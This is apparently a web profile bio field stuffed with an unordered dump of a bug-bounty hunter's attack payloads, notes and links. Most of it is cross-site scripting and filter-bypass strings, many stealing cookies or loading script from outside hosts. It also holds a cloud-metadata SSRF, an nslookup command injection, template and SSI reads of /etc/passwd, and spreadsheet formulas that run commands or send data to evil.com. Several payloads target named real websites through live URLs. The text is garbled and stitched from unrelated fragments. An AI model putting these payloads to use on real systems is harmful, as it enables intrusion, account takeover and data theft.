'"/><img/src=` onerror=alert('name')> mail'"/><img/src=` onerror=alert('name')> '"/><img/src=` onerror=alert('name')> mail'"/><img/src=` onerror=alert('name')>

imgsrc-onerroralertname
<div class="mb-20 bio-area"> "&gt;&lt;/img&gt;&lt;img src=x onerror=confirm(/Xss-By-Arafat/)&gt;/ &lt;/textarea&gt;&lt;ScRiPt&gt;prompt(/920065/)&lt;/ScRiPt// "&gt;&lt;iframe/onload=alert(document.domain)// "&gt;&lt;iframe/src=javascript%26colon;[document.domain].find(alert)&gt; &lt;vipin oncopy =prompt(document.domain)&gt; " ="" '&gt;&lt;svg onload=setInterval`prompt\x28document.domain\x29` {{constructor.constructor('alert(1)')()}} &lt;?='&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;'?&gt; &amp;lt;--`&lt;/a&gt;&lt;/script&gt;&lt;/svg&gt;&lt;img src="`" onerror="alert(1)"&gt; --!&amp;gt; https://bitsrc.io/ &lt;svg&gt;&lt;/p&gt;&lt;style&gt;&lt;a id="&lt;/style&gt;&lt;img src=1 onerror=alert(1)&gt;"&gt; &lt;a href=javas&amp;#99;ript:alert(1)&gt; &lt;details open ontoggle=alert(00)&gt; qwe&lt;details open ontoggle=alert.apply(self,[document.domain])&gt;qwe '"\&gt;&lt;img/src='1'onerror=alert(777)&gt;{{7*7}} javascript:x=’http://x.c’;alert(‘xss’);// ”/&gt;&amp;_lt;_script&gt;alert(1)&amp;_lt;/scr_ipt&amp;gt”/&gt; &lt;a href=javas&amp;#99;ript:alert(1)&gt;javascript:x= &lt;/script&gt;&lt;svg/onload=confirm(/yeasir/)&gt; "&gt;&lt;/script&gt;&lt;svg/onload=confirm(/yeasir/)&gt; &lt;/ScRiPt//"&gt;&lt;iframe/onload=alert(document.domain)// https://github.com/streaak/keyhacks &lt;a"/onclick=(confirm)(1)&gt;&lt;click here! test&lt;img src=x onerror=alert(document.domain) x=y &lt;div&gt;&lt;/svg.onload”=”confirm(domain)””/&gt;&lt;/div&gt; &lt;img src=x onerror=prompt(String.fromCharCode(47,88,83,83,80,79,83,69,68,47)) /&gt;&lt;!-- "&gt;&lt;img src=x Onerror="top[8680439..toString(30)](document.cookie)"&gt; "&gt;&lt;noscript&gt;&lt;p title="&lt;/noscript&gt;&lt;img src=x onerror=alert(1)&gt;"&gt; "&gt;&lt;object/onerror=prompt`1`// (A("onerror='alert`1`'testacd))/ " onfocus=alert;throw `1` autofocus&gt; %27-((alert))(document.cookie)-%27 test';alert(document.domain);' test";prompt`document.domain`; var x="1 );}};prompt(document.domain);function require(test){};function lol(){switch (1){case 1:console.log(1 ;&lt;svg/onload=x&gt;"&gt;&lt;/script&gt;&lt;svg/onload=(confirm)(document.domain)&gt; xss"&gt;&lt;!--&gt;&lt;svg/onload=alert(1)&gt; "/&gt;&lt;script&gt;confirm(1);&lt;/script&gt; &lt;svg/onload=eval(atob(‘YWxlcnQoZG9jdW1lbnQuY29va2llKQ==’))&gt; Bottom Exotic Payloads test'"&lt;svg%0aonload=((alert))(document.cookie)// https://18.222.108.105:80/ssrf.html " ="" '&gt;&lt;svg onload='this["src"]="jav"+"as&amp;Tab;cr"+"ipt:al"+"er"+"t()"';&gt; https://www.photoaffections.com/custom-blankets/personal-creation-p-62000?option_id=886&amp;qty=1&amp;paper=%27-alert(%22xss%20fired%22)-%27 https://www.photoaffections.com/custom-mugs/create-your-own-p-58377?view=%27-alert(1)-%27&amp;qty=1 https://www.photoaffections.com/canvas-prints/create_item.php?item_id=45322013&amp;custom_service_id=&amp;customer_comments="&gt;&lt;iframe/onload=alert(document.cookie)//&amp;proof_requested=1&amp;isAjax=true&amp;stepedge=1 https://www.pollardwater.com/misc/ajax/getContractAndStoreOfAccount.jsp?selectedAccountId=610&amp;selectedBranchId=POLLARDWTR%27 Php 7.1.x ?a=ls %3Cimg src='null' onerror=alert('Xss')%3E %3Cimg src onerror=%26emsp;prompt`${document.domain}`%3E &lt;svg/OnLoad="`${prompt``}`"&gt; ZI4XPJYV4 SRT_z1np0f2a14 Bcpsc22@ TE.CL Note To send this request using Burp Repeater, you must first go to the Repeater menu and make sure that the “Update Content-Length” option is unchecked. You need to include the ending sequence \ r \ n \ r \ n after the last 0. ]]] https://memn0ps.github.io/2019/09/13/HTTP-Request-Smuggling-CL-TE.html &lt;svg/onload=x&gt;"&gt;&lt;/script&gt;&lt;svg/onload=confirm(/123/)&gt; "onmouseover=prompt(document.domain);// 'onmouseover=prompt(document.domain);// &lt;x onauxclick=a=alert,a(domain)&gt;click &lt;script&gt;for((i)in(self))eval(i)(1)&lt;/script&gt; &lt;scr&lt;script&gt;ipt&gt;alert(1)&lt;/scr&lt;/script&gt;ipt&gt;&lt;scr&lt;script&gt;ipt&gt;alert(1)&lt;/scr&lt;/script&gt;ipt&gt; &lt;sCR&lt;script&gt;iPt&gt;alert(1)&lt;/SCr&lt;/script&gt;IPt&gt; &lt;video src=1 onerror=alert(1)&gt; &lt;audio src=1 onerror=alert(1)&gt; “&lt;script src=//xsshere?”@email.com “1-’or’1'=’1”@email.com WAF BYPASS PAYLOAD+ &lt;a%20onclick="document.write(document.cookie);"&gt;/ %3c&lt;aa+ONLOAD+href=javasONLOADcript:promptONLOAD(1)%3e &lt;object/data="javascript&amp;colon;alert/**/(document.domain)"&gt;// "&gt;&lt;/a&gt;&lt;object/data="javascript&amp;colon;alert/**/(document.domain)"&gt;// %22%3E%3Cd3v%2Fonauxclick%3D%5B2%5D.some%28confirm%29%3Eclick constant&lt;object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='&gt;&lt;/object&gt; &lt;iframe srcdoc=&lt;svg/o&amp;#x6Eload&amp;equals;alert&amp;lpar;1)&amp;gt;&gt; &lt;iframe/onload='this["src"]="jav"+"as&amp;Tab;cr"+"ipt:al"+"er"+"t()"';&gt; &lt;svg&lt;0x0c&gt;onload=alert(1)&gt;&lt;svg&gt; '&gt;&lt;details/open/ontoggle=confirm(document.location)&gt; &lt;style/&gt;&lt;img src="z'z&lt;/style&gt;&lt;script/z&gt;alert(1)&lt;/script&gt;"&gt; &lt;&lt;/div&gt;script&lt;/div&gt;&gt;alert()&lt;&lt;/div&gt;/script&lt;/div&gt;&gt; &lt;svg&gt;&lt;b&gt;&lt;style&gt;&lt;img id="&amp;lt;/style&amp;gt;&amp;lt;img src=1 onerror=alert(1)&amp;gt;"&gt; &lt;svg%0Aonauxclick=0;[1].some(confirm)// &lt;svg onload\r\n=$.globalEval("al"+"ert()");&gt; &lt;svg/onload=self[`aler`%2b`t`]`1`&gt; “&gt;&lt;svg/on&lt;/script&gt;load=alert`1`&gt; "--!&gt;&lt;svg/onload=prompt(/1234/)&gt;" "xss"&gt;&lt;!--&gt;&lt;svg/onload=alert(document.domain)&gt;" &lt;svg id=javascript:alert(10) onload=location=id&gt; 1'"()&amp;%&lt;%20&gt;&lt;ScRiPt &gt;prompt(1)&lt;/ScRiPt&gt; '-`aler`%2B`t`]`1`-' alert\\`1\\` &amp;&lt;script&amp;S1&amp;TS&amp;1&gt;alert&amp;A7&amp;(1)&amp;R&amp;UA;&amp;&amp;&lt;&amp;A9&amp;11/script&amp;X&amp;&gt; &gt;&lt;embed src=//14.rs&gt; &lt;script src=//14.rs&gt;&lt;/script&gt; &lt;script src="(https)://14.rs"&gt;&lt;/script&gt; "&gt;&lt;script src=https://xssbyyeasir.xss.ht&gt;&lt;/script&gt; "&gt;&lt;img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzYnl5ZWFzaXIueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&amp;#61;&amp;#61; onerror=eval(atob(this.id))&gt; &lt;iframe+src%3d"http%3a//169.254.169.254/latest/user-data"&gt;xss&lt;/iframe&gt; X-Forwarded-For:- &lt;a href=”attacker.com”&gt;&lt;h1&gt;&lt;font color=”red”&gt;Please click here to login to your account&lt;h1&gt;&lt;/font&gt;&lt;/a&gt; 6.31y7hu %2526%2Bnslookup%2Bcxx8nlugxbqajjeguq7iwpzsdbxnyfj5o-a6ssjqlda.r87.me%2526%2527%255c%2522%25600%2526nslookup%2Bcxx8nlugxbqajjeguq7iwpzsdbxnyfj5o-a6ssjqlda.r87.me%2526%2560%2527 "&gt;&lt;img src=x onerror="document.body.innerHTML='modified';alert(document.cookie);"&gt; &lt;form&gt;&lt;button formaction="javascript:alert(123)"&gt;xss&lt;noscript&gt;&lt;/noscript&gt;&lt;/button&gt;&lt;/form&gt; "&gt;&lt;d3v/onauxclick=[2].some(confirm)&gt;click &lt;&lt;scrip&lt;scriptT&gt;alert(1); 4320909150006705 05/2022 300 Number: 4111111111111111 Date: 03/30 CVV: 737 '"()&lt;tbm&gt;&lt;ScRiPt &gt;prompt(/XSSPOSED/)&lt;/ScRiPt&gt; &lt;a href="&amp;#x3000;javascript:alert(1)"&gt;CLICKME&lt;/a&gt; { 1 }; &lt;img src=x:alert(alt) onerror=eval(src) alt='spyerror'&gt; { 2 }; "&gt;&lt;/tag&gt;&lt;svg onload=alert(spyerror)&gt; - x" onerror="alert(document.domain) xss\"\u003E\u003Ch1 onmous\u0045leave=co\u006efirm(domain)\u003ECome to Me\u003C/h1\u003E\u003Cbr\u003E\u003C!-- --&gt;&lt;/title&gt;&lt;/script&gt;&lt;/iframe&gt;&lt;/style&gt;&lt;/textarea&gt;&lt;/span&gt;&lt;svg/onload=alert(String.fromCharCode(49))&gt; "&gt;&lt;object/onerror=prompt`1`//e&amp;discount;=0JAVASCript:/*-/*`/*\`/*%27/*"/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=prompt(%27openbugbounty%27)//&gt;\x3e "%27--!&gt;&lt;/Title/&lt;/Style/&lt;/Script/&lt;/Textarea/&lt;/Noscript/&lt;/Pre/&lt;/Xmp&gt;&lt;Script%20/K&gt;(confirm)(%27OpenBugBounty%27)&lt;/Script/&gt; &lt;script&gt;alert(1)&lt;/script&gt;’”;}) alert(1);&gt;&lt;link/onload=alert(1)&gt; "'--&lt;input type=text autofocus onfocus=(prompt)(document.domain) &lt;!--//'&gt;&lt;/input&gt; &lt;IMG SRC='vbscript:msgbox(\"XSS\")'&gt; &amp;#x3C;img src=x onerror=alert(document.domain)&amp;#x3E;TEST &lt;img src='1' onerror='alert(0)' &lt;y "&gt;&lt;svg/onload=alert(/2/);&gt; &lt;script&gt;alert(atob("SGVyZSBpcyB0aGUgWFNT"))&lt;/script&gt; &lt;script type="module"&gt;import'data:text/javascript;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ'&lt;/script&gt; "&gt;&lt;frameset/onpageshow=alert(/X/)&gt; &lt;input onfocus=prompt(document.domain) autofocus&gt;"--&gt; "/**/autofocus/**/onfocus="alert('XSSPOSED');" "&gt;&lt;/sCrIPt&gt;&lt;sCRIPt&gt;confirm(/XSs;/)&lt;/ScRiPt&gt; ;print(md5(xss)); set|set&amp;set &lt;/input&gt;&lt;input type=``text``//;valaue=`` autofocus onfocus=alert(1) a=``&gt; &lt;img src=1 alt=al lang=ert onerror=top[alt+lang](0)&gt; &lt;script&gt;$=1,alert($)&lt;/script&gt; &lt;script ~~~&gt;confirm(1)&lt;/script ~~~&gt; &lt;script&gt;$=1,\u0061lert($)&lt;/script&gt; &lt;&lt;/script/script&gt;&lt;script&gt;eval('\\u'+'0061'+'lert(1)')//&lt;/script&gt; &lt;&lt;/script/script&gt;&lt;script ~~~&gt;\u0061lert(1)&lt;/script ~~~&gt; &lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;alert(1)&lt;/scRipt&gt; &lt;img/id="alert&amp;lpar;&amp;#x27;XSS&amp;#x27;&amp;#x29;\"/alt=\"/\"src=\"/\"onerror=eval(id&amp;#x29;&gt; &lt;img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)&gt; &lt;svg&gt;&lt;x&gt;&lt;script&gt;alert&amp;#40;&amp;#39;1&amp;#39;&amp;#41&lt;/x&gt; &lt;iframe src=""/srcdoc='&amp;lt;svg onload&amp;equals;alert&amp;lpar;1&amp;rpar;&amp;gt;'&gt; {{7*7}}&lt;!--#exec cmd="cat /etc/passwd" --&gt;"&gt;&lt;iframe/onload=alert(document.domain)// &lt;sVg/oNloAd=//&gt;&lt;sVg/oNloAd=alert("XSS2")//&gt;@gmail.com &lt;!%27/*!"/*!\%27/*\"/*--!&gt;&lt;Input/Autofocus/%0D*/Onfocus=confirm`OPENBUGBOUNTY`//&gt;&lt;Svg&gt; --&gt;&lt;/script&gt;&lt;script&gt;alert(document.domain);// \”}})})-confirm`1`;(function(){({if(){/*/// \”}})})-confirm`1`(a=&gt;{({b:{/*/// \”-confirm`1`// “-prompt`1`-”// \u0027-confirm`1`-\u0027 ';alert(/OPENBUGBOUNTY/)// '-onfocus=alert(document.domain)-' javascript:alert(1);// javascript:alert(document.domain) "onmouseover="prompt(document.domain) h/&lt;\i&lt;script&gt;alert("i");&lt;/script&gt; "&gt;&lt;marquee&gt;&lt;IMG src=x onmouseover=prompt(document.domain);&gt;&lt;/marquee&gt; https://www.playstation.com/en-us/search/?q=" /&gt;&lt;script&gt;alert(1);// '-confirm(document.domain)-' "&gt;&lt;img/src='1'onerror=alert(1)&gt; "&gt;&lt;svg/onload=alert(domain)&gt; "&gt;&lt;script&gt;alert('xss')&lt;/script&gt; "&gt;&lt;img src=x onerror=alert(domain)&gt;@ymail.com "&gt;&lt;img src=x onerror=prompt(document.domain)&gt;" "&gt; &lt;img src="x" onerror="prompt(domain)"&gt;&lt;/img&gt; Hackthegif #"&gt;&lt;img src=c onerror=alert(1)&gt;/ #//&gt;&lt;img src=x&gt;&lt;svg/onload=confirm("Xss-By-Arafat")&gt;/ &lt;/script&gt;&lt;video src=x onerror=alert(document.domain)&gt; "&gt;&lt;/sCrIPt&gt;&lt;sCRIPt&gt;confirm(/XSs;/)&lt;/ScRiPt&gt; javascript://google.com/?%0aalert(document.domain) &amp;lt;img src=x onerror=prompt(999)&amp;gt; &amp;#34;&amp;#62;&amp;#60;img/src=1 onerror=alert(1)&amp;#62; %22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%280%29%3E aaa"&gt;fffff&lt;/script&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;aaaaa "&gt;&lt;/title&gt;&lt;img src=1 onerror=prompt(document.domain)&gt; %27%22%3E%3Cscript%3Ealert%28%27XSS%20@%20%27%2bdocument.domain%29%3C%2fscript%3E data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ 0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg" HTTP-EQUIV="refresh" a="a &gt;&gt; meta tag 0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh" 0;data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"HTTP-EQUIV="refresh" 0;http://evil.com"HTTP-EQUIV="refresh" &lt;input type="text" value="" onmouseover="alert('XSS')"&gt; url=google.com:/onclick='alert(document.domain)'[url=]]xss[/url] ![xss" onload=alert(1);//](a) ![Uh oh...]("onerror="alert('XSS')) javascripT://https://google.com%0aalert(1);//https://google.com javascript://deals.razerzone.com/%E2%80%A8alert(1)//https://deals.razerzone.com %03javascript://deals.razerzone.com/%E2%80%A8alert(1)//https://deals.razerzone.coms %00javascript://yeasir.com/%E2%80%A8alert(document.domain)//https://yeasir.com https://airvpn.org/external_link/?url=%03javascript://deals.razerzone.com/%E2%80%A8alert(document.domain)//https://deals.razerzone.comsdfs%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0) &lt;?xml version="1.0"?&gt;&lt;x:script xmlns:x="http://www.w3.org/1999/xhtml"&gt;alert(document.domain&amp;#x29;&lt;/x:script&gt; “&gt;&lt;?xml version=”1.0" standalone=”no”?&gt;&lt;!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"&gt;&lt;svg version=”1.1" baseProfile=”full” xmlns=”http://www.w3.org/2000/svg"&gt;&lt;polygon id=”triangle” points=”0,0 0,50 50,0" fill=”#009900" stroke=”#004400"/&gt;&lt;script type=”text/javascript”&gt;alert(document.location);&lt;/script&gt;&lt;/svg&gt; This is an outdated page. You will now be redirected to our new page"); window.location="https://google.com"// JaVaScRiPT%0a:alert(document.cookie);///// java%0d%0ascript%0d%0a:alert(0) javascript:new%20Function`al\ert\`2222\``; javascript://www.whitelisteddomain.tld?%a0alert%281%29 &lt;form&gt;&lt;button formaction="javascript:alert(123)"&gt;xss {php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php} =HYPERLINK(“http://evil.com?x=”&amp;A3&amp;”,”&amp;B3&amp;”[CR]”,”Error fetching info: Click me to resolve.”) =cmd|'/C calc'!A0 =cmd|' /C calc'!A0 =cmd|’ /C notepad’!’A1′ ;=2+5+cmd|' /C calc'!A0 =2+2 {7*7} %{2+2} %{%{2+2}} {{7*7}}&lt;!--#exec cmd="cat /etc/passwd" --&gt; &amp;#x3C;img/­src=&amp;#x60;%00&amp;#x60; onerror=this.onerror­=alert(document.cook­i) &lt;svg/on&lt;script&gt;load=prompt(document.domain);&gt;”/&gt;&lt;svg/on&lt;script&gt;load=prompt(document.cookie);&gt; &lt;a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&gt;poc&lt;/a&gt; &lt;b"/onauxclick='-alert(1);'&gt;XXS The payload will run in all the context. Eg - &lt;input type="text" value="&lt;b"/onauxclick='-alert(1);'&gt;XXS"&gt; &lt;b"/onauxclick='-alert(2);'&gt;XXS yeasir"&gt;&lt;h1&gt;&lt;a/href="javascript&amp;colon;alert&amp;lpar;document&amp;period;domain&amp;rpar;"&gt;click_me&lt;/a&gt;arafat_is_html_injection.....&lt;style&gt;h1{background-color:red;color:yellow;} &lt;script&gt; var test='&lt;b"/onauxclick='-alert(3);'&gt;TEST'; &lt;/script&gt; &lt;noscript&gt;&lt;p title="&lt;/noscript&gt;&lt;img src=x onerror=alert(1)&gt;"&gt; &lt;noscript&gt;&lt;p title="&lt;/noscript&gt;&lt;svg/onload=alert(45)&gt;"&gt; &lt;noframes&gt;&lt;p title="&lt;/noframes&gt;&lt;svg/onload=alert(45)&gt;"&gt; &lt;iframe&gt;&lt;p title="&lt;/iframe&gt;&lt;svg/onload=alert(45)&gt;"&gt; &lt;xmp&gt;&lt;p title="&lt;/xmp&gt;&lt;svg/onload=alert(45)&gt;"&gt; [11:48 AM, 4/12/2019] Yeasir Arafat: " onload="javascript:alert('XSS Example') [11:49 AM, 4/12/2019] Yeasir Arafat: " onload="alert(String.fromCharCode(88,83,83)) https://google.com\'onmouseover='prompt(1)' &lt;div id="document.domain"&gt;&lt;svg&gt;&lt;style&gt;&amp;lt;img/src=x onerror=prompt(document.domain)// &lt;/br&gt;//["`--&gt;]]&gt;]&lt;/div&gt; &lt;a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&gt;poc&lt;/a&gt; &lt;img ismap='xxx' itemtype='yyy style=width:100%;height:100%;position:fixed;left:\ 0px;top:0px; onmouseover=alert(/XSS/)//'&gt; "&gt;&lt;/script&gt;&lt;svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)&gt; &lt;iframe src=%22404%22 onload=%22top.frames[0].document.(%26quot;&lt;script&gt;r=new XMLHttpRequest();r.open('POST','https://www.facebook.com',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}&lt;\/script&gt;%26quot;)%22&gt;&lt;/iframe&gt; &lt;sCrIpt&gt;alert(1)&lt;/ScRipt&gt; &lt;script x&gt; &lt;script x&gt;alert('XSS')&lt;script y&gt; &lt;img src='1' onerror='alert(0)' &lt; String.fromCharCode(88,83,83) http://localhost/bla.php?test=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt; &lt;html&gt; &lt;script&gt; &lt;?php echo 'foo="text '.$_GET['test'].'";';`?&gt; &lt;/script&gt; &lt;/html&gt; Bypass quotes in mousedown event &lt;a href="" onmousedown="var name = '&amp;#39;;alert(1)//'; alert('smthg')"&gt;Link&lt;/a&gt; &lt;script&gt;window['alert'](document['domain'])&lt;script&gt; alert`1` Bypass onxxxx= blacklist &lt;object onafterscriptexecute=confirm(0)&gt; &lt;object onbeforescriptexecute=confirm(0)&gt; &lt;img src='1' onerror\x00=alert(0) /&gt; &lt;img src='1' onerror\x0b=alert(0) /&gt; &lt;img src='1' onerror/=alert(0) /&gt; &lt;img/src='1'/onerror=alert(0)&gt; &lt;div id = "x"&gt;&lt;/div&gt;&lt;script&gt;alert(x.parentNode.parentNode.parentNode.location)&lt;/script&gt; &lt;script&gt; foo="text &lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;"; &lt;/script&gt; #JS/URL polyglot" data:text/html;alert(1)/*,&lt;svg%20onload=eval(unescape(location))&gt;&lt;title&gt;*/;alert(2);function%20text(){};function%20html(){} #WASM https://vulnerabledoma.in/polyglot/wasmjscsshtml.html #BlindXSS '"&gt;*/--&gt;&lt;/title&gt;&lt;/style&gt;&lt;/textarea&gt;&lt;/script%0A&gt;&lt;img src=x onerror=confirm(1)&gt; #xss " onclick=alert(1)//&lt;button ‘ onclick=alert(1)//&gt; */ alert(1)// #xss2 ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- &gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83)) &lt;/SCRIPT&gt; #xss3 "&gt;&gt;&lt;marquee&gt;&lt;img src=x onerror=confirm(1)&gt;&lt;/marquee&gt;" &gt;&lt;/plaintext\&gt;&lt;/|\&gt;&lt;plaintext/onmouseover=prompt(1) &gt;&lt;script&gt;prompt(1)&lt;/script&gt;@gmail.com&lt;isindex formaction=javascript:alert(/XSS/) type=submit&gt;'--&gt;" &gt;&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;"&gt;&lt;img/id="confirm&amp;lpar; 1)"/alt="/"src="/"onerror=eval(id&amp;%23x29;&gt;'"&gt;&lt;img src="http: //i.imgur.com/P8mL8.jpg"&gt;  #sqli SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/ https://medium.com/@arbazhussain/stored-xss-on-rockstar-game-c008ec18d071 Rules &gt; http://h1.nobbd.de/ http://bugbountyworld.com/ https://medium.com/@phwd https://whitton.io/ https://medium.com/@arbazhussain/10-rules-of-bug-bounty-65082473ab8c Facebook&gt;&gt; https://web.facebook.com/notes/phwd/facebook-bug-bounties-the-unofficial-treasure-map/1020506894706001?_rdc=1&amp;_rdr https://medium.com/@rajsek/my-3rd-facebook-bounty-hat-trick-chennai-tcs-er-name-listed-in-facebook-hall-of-fame-47f57f2a4f71 PostMessage-XSS: &lt;body onload="hack()"&gt;&lt;script&gt; function hack(){ window.parent.postMessage( {"location":null, "text":null, "html": null, "base64": null}, "*"); }&lt;/script&gt;&lt;/body&gt; https://challenge.intigriti.io/#data:text/html;alert(document.domain);base64,PGJvZHkgb25sb2FkPSJoYWNrKCkiPjxzY3JpcHQ+IGZ1bmN0aW9uIGhhY2soKXsgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSggeyJsb2NhdGlvbiI6bnVsbCwgInRleHQiOm51bGwsICJodG1sIjogbnVsbCwgImJhc2U2NCI6IG51bGx9LCAiKiIpOyB9PC9zY3JpcHQ+PC9ib2R5Pg https://challenge.intigriti.io/?#data:text/html;lol=alert(document.domain)//;base64,PHNjcmlwdD5zZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cGFyZW50LnBvc3RNZXNzYWdlKHsidGV4dCI6IDEsICJodG1sIjogMiwgImJhc2U2NCI6IDN9LCAiKiIpO30sIDE1MDApPC9zY3JpcHQ+ICAg &amp; &lt;/script&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt; "'--!&gt;&lt;/Iframe&gt;&lt;Iframe /SrcDoc=%26lt;Svg/O%26%23x6Eload%26equals;confirm%26lpar;1%26rpar;%26gt;&gt;# eeee&lt;%2fscript&gt;&lt;script&gt;prompt(/XSS/.source)&lt;%2fscript&gt;yyyy &lt;!'/*"/*\'/*\"/*--&gt;&lt;/Script&gt;&lt;Image SrcSet=K */; OnError=confirm`1` //&gt;# %3C!%27/*%22/*\%27/*\%22/*--%3E%3C/Script/%3E%3CScript%3Econfirm(document.domain)%3C/Script/%3E# &lt;--`&lt;img/src=` onerror=alert(1)&gt; --!&gt; &lt;script/src=&amp;#100&amp;#97&amp;#116&amp;#97:text/&amp;#x6a&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x000070&amp;#x074,&amp;#x0061;&amp;#x06c;&amp;#x0065;&amp;#x00000072;&amp;#x00074;(1)&gt;&lt;/script&gt; &lt;div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)"&gt;x&lt;/button&gt; &lt;form&gt;&lt;button formaction=javascript&amp;colon;alert(1)&gt;CLICKME &lt;SCRIPT&gt;alert();&lt;/SCRIPT&gt;"&gt;&lt;&lt;SCRIPT&gt;alert();&lt;/SCRIPT&gt;img src=x onerror=alert(1);&gt;&lt;SCRIPT&gt;alert();&lt;/SCRIPT&gt; &lt;SCRIPT&gt;alert();&lt;/SCRIPT&gt;"&gt;&lt;&lt;SCRIPT&gt;&lt;/SCRIPT&gt;img src=x onerror=alert(1);&gt;&lt;SCRIPT&gt;alert();&lt;/SCRIPT&gt; &amp;lt;--`&lt;/a&gt;&lt;/script&gt;&lt;/svg&gt;&lt;img src="`" onerror="alert(1)"&gt; --!&amp;gt; &lt;/x&gt;&lt;/svg&gt;&lt;iframe src="" srcdoc="&amp;lt;svg onload=alert(15)&amp;gt;"&gt;{{7*7}} &lt;script src="data:text/javascript,alert(1)"&gt;&lt;/script&gt; &lt;a onmouseover="alert(document.cookie)"&gt;xxs link&lt;/a&gt; &lt;marquee onstart='javascript:alert&amp;#x28;1&amp;#x29;'&gt;^__^ #&lt;iframe src=javascript:alert(document.domain) /&gt; &gt;&lt;marquee onstart=alert(1233)&gt;test alert(document.getElementsByName(%22SAMLResponse%22)[0].defaultValue);// "&gt;&lt;h1&gt;&lt;a/href="javascript&amp;colon;alert&amp;lpar;document&amp;period;domain&amp;rpar;"&gt;click_me&lt;/a&gt;this_is_html_injection.....&lt;style&gt;h1{background-color:red;color:yellow;} "&gt;&lt;iframe/onload=aaaaajavascript&amp;colon;alert&amp;lpar;document&amp;period;domain&amp;rpar;&gt; &gt;&lt;/span&gt;&lt;p onmouseover='p=~[];p={___:++p,$$$$:(![]+"")[p],__$:++p,$_$_:(![]+"")[p],_$_:++p,$_$$:({}+"")[p],$$_$:(p[p]+"")[p],_$$:++p,$$$_:(!""+"")[p],$__:++p,$_$:++p,$$__:({}+"")[p],$$_:++p,$$$:++p,$___:++p,$__$:++p};p.$_=(p.$_=p+"")[p.$_$]+(p._$=p.$_[p.__$])+(p.$$=(p.$+"")[p.__$])+((!p)+"")[p._$$]+(p.__=p.$_[p.$$_])+(p.$=(!""+"")[p.__$])+(p._=(!""+"")[p._$_])+p.$_[p.$_$]+p.__+p._$+p.$;p.$$=p.$+(!""+"")[p._$$]+p.__+p._+p.$+p.$$;p.$=(p.___)[p.$_][p.$_];p.$(p.$(p.$$+"\""+p.$_$_+(![]+"")[p._$_]+p.$$$_+"\\"+p.__$+p.$$_+p._$_+p.__+"(\\\"\\"+p.__$+p.__$+p.___+p.$$$_+(![]+"")[p._$_]+(![]+"")[p._$_]+p._$+",\\"+p.$__+p.___+"\\"+p.__$+p.__$+p._$_+p.$_$_+"\\"+p.__$+p.$$_+p.$$_+p.$_$_+"\\"+p.__$+p._$_+p._$$+p.$$__+"\\"+p.__$+p.$$_+p._$_+"\\"+p.__$+p.$_$+p.__$+"\\"+p.__$+p.$$_+p.___+p.__+"\\\"\\"+p.$__+p.___+")"+"\"")())();'&gt; XSS&lt;svg/onload="eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41));"&gt; &lt;/title&gt;&lt;svg onload="&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000100&amp;#0000111&amp;#0000099&amp;#0000117&amp;#0000109&amp;#0000101&amp;#0000110&amp;#0000116&amp;#0000046&amp;#0000100&amp;#0000111&amp;#0000109&amp;#0000097&amp;#0000105&amp;#0000110&amp;#0000041"&gt; XSS&lt;img src='a'/onerror='eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,59));'/&gt; &lt;var onmouseover="prompt(document.cookie)"&gt;x275&lt;/var&gt; 01721037692 https://vulnerabilities.in/blog/ https://medium.com/@ozguralp/simple-remote-code-execution-vulnerability-examples-for-beginners-985867878311 https://medium.com/@mohdaltaf163/uploading-backdoor-for-fun-and-profit-rce-db-cred-p1-2cdaa00e2125 